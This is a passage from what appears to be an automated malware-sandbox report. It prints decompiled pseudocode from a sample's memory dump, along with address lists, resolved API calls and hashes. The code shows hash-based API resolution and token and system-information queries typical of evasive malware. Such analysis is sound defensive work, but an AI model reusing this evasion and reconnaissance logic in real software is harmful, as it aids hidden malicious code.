									E7056F8C4(_t424 + 0x24, E7056F568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E7056F558(_t424 + 0x24, E7056F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E705754EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E7056F6F0(_t424 + 0x20);
								E7057551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E705757D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E7056E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E7057551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E705757D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E7056E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E7057551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E705757D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E7056E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E7056D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E705754C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E7056D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E705754C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E7056D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E705754C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E7056D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E705754C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E7056D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E705754C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E7056D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E705754C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x7057d1f8 + 0x24)) = _t186;
							_t187 = E705710CC(0xffffffffffffffff);
							_t314 =  *0x7057d1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x7057d1f8 + 0x2c)) = E70571140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E70572F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x7057d1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E7057352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E7057352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E7056F620(_t424 + 0x18c, _t202);
											_t403 = E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E7056F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E7056F558(_t424 + 0x18c, 0);
												_t209 = E7056F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E7057352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E7056F558(_t424 + 0x18c, 0);
													E7056DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E70572F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E7056E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E70572F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E7056E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E70574BE0( *((intOrPtr*)(_t424 + 0x1b8)), E7056E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E7056E054(_t424 + 0x1b8);
														E7056E054(_t424 + 0x1b0);
														E7056F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E7056BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x7057d1f8 + 0x2c)) = 6;
															L78:
															_t192 = E70572F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x7057d1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E7056BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E7057352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E7057352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E7056F620(_t424 + 0x3c, _t258);
									_t261 = E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E7056F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E7056F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E7056F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E7057352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E7056F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E70572F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E7057352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E70571070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E70572F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E7056BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x705707cc
0x705707cd
0x705707ce
0x705707d0
0x705707db
0x705707dd
0x705707e4
0x70571063
0x70571069
0x70571069
0x705707ee
0x705707fa
0x70570806
0x7057080b
0x70570818
0x70570822
0x70570829
0x7057082e
0x70570832
0x70570836
0x7057083b
0x7057083e
0x70570844
0x7057084a
0x70570857
0x7057085e
0x70570865
0x70570868
0x7057086b
0x7057086d
0x70570879
0x70570886
0x70570893
0x70570895
0x70570897
0x70570923
0x70570923
0x70570929
0x7057092c
0x70570931
0x70570934
0x7057094c
0x7057094d
0x7057094d
0x7057094d
0x70570951
0x7057095a
0x7057095f
0x7057095f
0x70570961
0x70570972
0x70570994
0x70570996
0x70570997
0x7057099b
0x7057099b
0x705709a4
0x705709b0
0x705709b9
0x705709cf
0x705709df
0x705709e4
0x705709e8
0x705709ed
0x705709ef
0x70570a3f
0x70570a54
0x70570a58
0x70570a5d
0x70570a6e
0x70570a83
0x70570a87
0x70570a8c
0x70570a8e
0x70570ad5
0x70570ad8
0x70570b26
0x70570b29
0x00000000
0x70570b2b
0x70570b2b
0x70570b2e
0x00000000
0x70570b30
0x70570b34
0x70570b39
0x70570b3e
0x70570b40
0x70570b44
0x70570b46
0x70570b4d
0x70570b4d
0x70570b48
0x70570b48
0x70570b4b
0x70570b51
0x70570b51
0x00000000
0x00000000
0x00000000
0x70570b4b
0x70570b53
0x70570b55
0x70570b58
0x70570b58
0x70570b55
0x70570b5d
0x70570b67
0x70570b67
0x70570b2e
0x70570ada
0x70570ada
0x70570adc
0x70570b1b
0x70570b1e
0x70570e90
0x70570e95
0x70570e9a
0x70570e9c
0x70570ea0
0x70570ea2
0x70570ea9
0x70570ea9
0x70570ea4
0x70570ea4
0x70570ea7
0x70570ead
0x70570ead
0x00000000
0x00000000
0x00000000
0x70570ea7
0x70570eaf
0x70570eb1
0x70570eb4
0x70570eb4
0x70570eb1
0x70570eb9
0x70570ec3
0x70570b24
0x00000000
0x70570b24
0x70570ade
0x70570ae2
0x70570ae7
0x70570aec
0x70570aee
0x70570af2
0x70570af4
0x70570afb
0x70570afb
0x70570af6
0x70570af6
0x70570af9
0x70570aff
0x70570aff
0x00000000
0x00000000
0x00000000
0x70570af9
0x70570b01
0x70570b03
0x70570b06
0x70570b06
0x70570b03
0x70570b0b
0x70570b15
0x70570b15
0x70570adc
0x70570a90
0x70570a90
0x70570a92
0x70570b6a
0x70570b6e
0x70570b73
0x70570b78
0x70570b7a
0x70570b7e
0x70570b80
0x70570b87
0x70570b87
0x70570b82
0x70570b82
0x70570b85
0x70570b8b
0x70570b8b
0x00000000
0x00000000
0x00000000
0x70570b85
0x70570b8d
0x70570b8f
0x70570b92
0x70570b92
0x70570b8f
0x70570b97
0x70570b97
0x70570b99
0x70570a98
0x70570a9c
0x70570aa1
0x70570aa6
0x70570aa8
0x70570aac
0x70570aae
0x70570ab5
0x70570ab5
0x70570ab0
0x70570ab0
0x70570ab3
0x70570ab9
0x70570ab9
0x00000000
0x00000000
0x00000000
0x70570ab3
0x70570abb
0x70570abd
0x70570ac0
0x70570ac0
0x70570abd
0x70570ac5
0x70570acf
0x70570acf
0x70570a92
0x705709f1
0x705709f5
0x705709fa
0x705709ff
0x70570a01
0x70570a05
0x70570a07
0x70570a0e
0x70570a0e
0x70570a09
0x70570a09
0x70570a0c
0x70570a12
0x70570a12
0x00000000
0x00000000
0x00000000
0x70570a0c
0x70570a14
0x70570a16
0x70570a19
0x70570a19
0x70570a16
0x70570a1e
0x70570a28
0x70570a28
0x70570936
0x70570938
0x70570938
0x70570ba2
0x70570ba5
0x70570baa
0x70570bac
0x70570bb5
0x70570bc1
0x70570bc4
0x70570c92
0x70570c9a
0x00000000
0x70570bca
0x70570bd4
0x70570be6
0x70570be8
0x70570bea
0x70570c76
0x70570c76
0x70570c78
0x70570c7c
0x70570c87
0x70570c7e
0x70570c7e
0x70570c7e
0x00000000
0x70570bf0
0x70570bfc
0x70570bfe
0x70570c00
0x7057104f
0x70571054
0x70571056
0x00000000
0x7057105c
0x00000000
0x7057105c
0x70570c06
0x70570c06
0x70570c17
0x70570c1b
0x70570c20
0x70570c32
0x70570c34
0x70570c36
0x70570c4d
0x70570c4f
0x70570c51
0x70570ec9
0x70570ec9
0x70570c51
0x70570c57
0x70570c5e
0x70570c60
0x70570edb
0x70570ef1
0x70570ef3
0x70570ef5
0x70571030
0x70571037
0x00000000
0x70570efb
0x70570f04
0x70570f12
0x70570f2c
0x70570f2e
0x70570f30
0x70571041
0x70571046
0x70571048
0x00000000
0x7057104a
0x00000000
0x7057104a
0x70570f36
0x70570f36
0x70570f44
0x70570f4f
0x70570f5e
0x70570f70
0x70570f72
0x70570f74
0x70570f81
0x70570f81
0x70570f91
0x70570fa2
0x70570fa7
0x70570fa9
0x70570fbf
0x70570fe0
0x70570fe9
0x70570ff5
0x70571001
0x70571006
0x7057100b
0x70571011
0x70571011
0x70571016
0x7057101c
0x00000000
0x70571022
0x70571024
0x70570c9d
0x70570ca9
0x70570cb0
0x70570cb2
0x70570cbc
0x70570cbc
0x70570cbe
0x70570cc0
0x70570ccf
0x70570cdb
0x70570cdf
0x70570ce2
0x70570ce5
0x70570ce8
0x00000000
0x70570ce8
0x70570fab
0x70570fab
0x70570fb2
0x70570fb3
0x70570fb3
0x70570fa9
0x70570f30
0x70570c66
0x70570c66
0x70570c66
0x70570c6b
0x70570c71
0x70570c71
0x00000000
0x70570c6b
0x70570c60
0x70570c00
0x70570bea
0x7057089d
0x705708a9
0x705708ab
0x705708ad
0x70570e7a
0x70570e7f
0x70570e81
0x00000000
0x70570e87
0x00000000
0x70570e87
0x705708b3
0x705708b3
0x705708c4
0x705708c8
0x705708cd
0x705708da
0x705708e1
0x705708e3
0x705708fa
0x705708fc
0x705708fe
0x70570cf6
0x70570cf6
0x705708fe
0x70570904
0x7057090b
0x7057090d
0x70570d05
0x70570d16
0x70570d1b
0x70570d1d
0x70570d1f
0x70570e50
0x70570e54
0x00000000
0x70570d25
0x70570d2b
0x70570d50
0x70570d52
0x70570d54
0x70570e6c
0x70570e71
0x70570e73
0x00000000
0x70570e75
0x00000000
0x70570e75
0x70570d5a
0x70570d5a
0x70570d65
0x70570d6c
0x70570d73
0x70570d7a
0x70570d7b
0x70570d7c
0x70570d8e
0x70570d90
0x70570d92
0x00000000
0x70570d98
0x70570d9a
0x70570db5
0x70570db7
0x70570db9
0x70570e5e
0x70570e63
0x70570e65
0x00000000
0x70570e67
0x00000000
0x70570e67
0x70570dbf
0x70570dbf
0x70570dbf
0x70570dc6
0x70570dca
0x70570e35
0x70570e35
0x70570e37
0x70570e3e
0x70570e3e
0x70570e39
0x70570e39
0x70570e3c
0x70570e42
0x70570e42
0x00000000
0x00000000
0x00000000
0x70570e3c
0x70570e44
0x70570e46
0x70570e4b
0x70570e4b
0x00000000
0x70570dcc
0x70570dcc
0x70570dcc
0x70570dce
0x70570dda
0x70570ddf
0x70570de1
0x00000000
0x00000000
0x70570e2f
0x70570e30
0x70570e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70570e33
0x70570de3
0x70570de7
0x70570dee
0x70570def
0x70570def
0x70570dca
0x70570db9
0x70570d92
0x70570d54
0x70570913
0x70570913
0x70570913
0x70570918
0x7057091e
0x7057091e
0x00000000
0x70570918
0x7057090d
0x705708ad
0x7057082b
0x7057082b
0x7057082c
0x7057082d
0x7057082d
0x70570ceb
0x70570ceb
0x70570cf5
0x70570cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 705708FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 70570CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 70570D50

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 3baebcb877fbc2aaa43e4abae7874aba6b5e9f31d450bed30104d056fa4f66f3
Instruction ID: 18ea935fca6b4563845cc978d207901944f442d036baf19ef8b79e5f9d3bb7dc
Opcode Fuzzy Hash: 3baebcb877fbc2aaa43e4abae7874aba6b5e9f31d450bed30104d056fa4f66f3
Instruction Fuzzy Hash: C622B070604341AEEB11DF20CC49BAF7BE9AFC1710F10E91EB48A87291EB70E945E752

Uniqueness

Uniqueness Score: -1.00%

Function 70561494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E70561494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E7056F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v76, E7056F568( &_v76) + 0x10);
				E7056F558( &_v80, E7056F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v84, E7056F568(_t325) + 0x10);
				E7056F558( &_v88, E7056F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v92, E7056F568(_t329) + 0x10);
				E7056F558( &_v96, E7056F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v100, E7056F568(_t333) + 0x10);
				E7056F558( &_v104, E7056F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v108, E7056F568(_t337) + 0x10);
				E7056F558( &_v112, E7056F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v116, E7056F568(_t341) + 0x10);
				E7056F558( &_v120, E7056F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v124, E7056F568(_t345) + 0x10);
				E7056F558( &_v128, E7056F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v132, E7056F568(_t349) + 0x10);
				E7056F558( &_v136, E7056F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v140, E7056F568(_t353) + 0x10);
				E7056F558( &_v144, E7056F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v148, E7056F568(_t357) + 0x10);
				E7056F558( &_v152, E7056F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v156, E7056F568(_t361) + 0x10);
				E7056F558( &_v160, E7056F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v164, E7056F568(_t365) + 0x10);
				E7056F558( &_v168, E7056F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v172, E7056F568(_t369) + 0x10);
				E7056F558( &_v176, E7056F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v180, E7056F568(_t373) + 0x10);
				E7056F558( &_v184, E7056F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E7056F8C4( &_v188, E7056F568(_t377) + 0x10);
